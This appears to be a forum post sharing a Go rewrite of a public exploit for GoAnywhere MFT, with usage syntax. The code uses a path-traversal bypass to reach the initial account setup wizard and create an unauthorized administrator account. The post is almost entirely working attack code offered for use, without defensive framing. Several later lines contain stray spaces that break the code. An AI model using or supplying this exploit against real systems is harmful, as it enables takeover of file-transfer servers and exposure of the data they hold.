Was having some issues with the public exploit so I rewrote it in GO
syntax:
go run rce.go http://1.2.3.4:8855 user pass
Password should be 8 char minimum
Код:
package main
import (
"crypto/tls"
"fmt"
"log"
"net/http"
"net/url"
"os"
"github.com/PuerkitoBio/goquery"
)
func main() {
endpoint := os.Args[1]
username := os.Args[2]
password := os.Args[3]
client := &http.Client{
Transport: &http.Transport{
TLSClientConfig: &tls.Config{InsecureSkipVerify: true},
},
}
resp, err := client.Get(fmt.Sprintf("%s/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml", endpoint))
if err != nil {
log.Fatal(err)
}
defer resp.Body.Close()
doc, err := goquery.NewDocumentFromReader(resp.Body)
if err != nil {
log.Fatal(err)
}
viewState := doc.Find("input[name=javax.faces.ViewState]").AttrOr("value", "")
data := map[string]string{
"j_id_u:creteAdminGrid:username": username,
"j_id_u:creteAdminGrid:password_hinput": password,
"j_id_u:creteAdminGrid:password": "\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022",
"j_id_u:creteAdminGrid:confirmPassword_hinput": password,
"j_id_u:creteAdminGrid:confirmPassword": "\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022\u2022",
"j_id_u:creteAdminGrid:submitButton": "",
"createAdminForm_SUBMIT": "1",
"javax.faces.ViewState": viewState,
}
dataValues := url. Values{}
for key, value := range data {
dataValues.Add(key, value)
}
resp, err = client. PostForm(fmt. Sprintf("%s/goanywhere/images/..; /wizard/InitialAccountSetup.xhtml", endpoint), dataValues)
if err != nil {
log. Fatal(err)
}
defer resp. Body.Close()
if resp. StatusCode != 200 {
log. Fatal("Failed to create new admin user")
}
doc, err = goquery. NewDocumentFromReader(resp. Body)
if err != nil {
log. Fatal(err)
}
errorMessage := doc. Find("span.ui-messages-error-summary"). Text()
if errorMessage != "" {
log. Fatal(errorMessage)
}
fmt. Println("New admin user created successfully")
}syntax:
go run rce.go http://1.2.3.4:8855 user pass
Password should be 8 char minimum
